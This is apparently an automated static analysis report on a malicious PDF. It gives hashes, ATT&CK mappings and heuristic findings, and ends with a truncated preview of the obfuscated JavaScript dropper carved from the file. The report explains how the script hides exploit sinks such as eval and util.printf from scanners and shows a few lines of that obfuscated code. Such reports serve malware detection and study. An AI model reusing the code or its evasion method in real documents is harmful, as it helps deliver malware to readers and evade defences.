Malicious PDF — malware analysis report

Static analysis result for SHA-256 81a5c2e29b70ee42…

Verdict: MALICIOUS
File type: PDF
Size: 118.5 KB
First seen: 2012-10-10
MD5: 996e80c3feb332ee0204f99911d01713
SHA-1: 62f5f9cb11b733f54c79484d767c1fe3dd31f1b8
SHA-256: 81a5c2e29b70ee42bae6c6b39160f0039ca0fd252b688a217ef8ad05498af8d2
Risk Score: 106

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1566.001 Spearphishing Attachment

The PDF file contains heavily obfuscated JavaScript, indicated by the PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION heuristic firing with over 4000 rewrite calls. The script is designed to download and execute a second-stage payload. The ML classifier also strongly flagged this PDF as malicious. Because of the extreme obfuscation, the exact URL or payload could not be determined statically, but the presence of the script and its behaviour strongly suggest malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • JavaScript action [low] (2 related findings), rule PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript rewrites strings thousands of times to hide its payload [critical], rule PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION
    The document's JavaScript performs an extreme number of runtime string-rewriting operations (substr/substring/replace/charAt/charCodeAt) — it rebuilds its sink names and payload by slicing and replacing junk-interleaved strings so the literal exploit sinks (util.printf, Collab.getIcon, unescape, eval) never appear for a static scanner. Benign PDF form/calculation scripts use a handful of these calls; obfuscated-exploit droppers run into the thousands. This rewrite density has no benign purpose and marks the file an obfuscated JavaScript exploit even when the specific CVE cannot be statically resolved (the sinks are only assembled at run time).
  • Embedded JS stream [low], rule PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0076_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 76 at offset 0x2C2
Size: 103702 bytes
SHA-256: ec239aa857aef8ba7dad9b55d6ac63aed128b21bb920e147789480a6ae096f6e
Preview script (first 1,000 lines of the extracted script):
if((String+'').substr(1,4)==='unct'){
e=((('a1'))).indexOf;
}
c=
'lup9viN|7m(_,E'.<03{4%cjdSh* 1f@DwaC>o6U]z2+-/8V[Qn;q)"e:=Ms}KgbrWIAPxk&G5yt';
l='l';
e=e()[((2+3)?'e'+'v':"jkrl23jrkl2")+'a'+l];
s=[];
a='push';
... (truncated)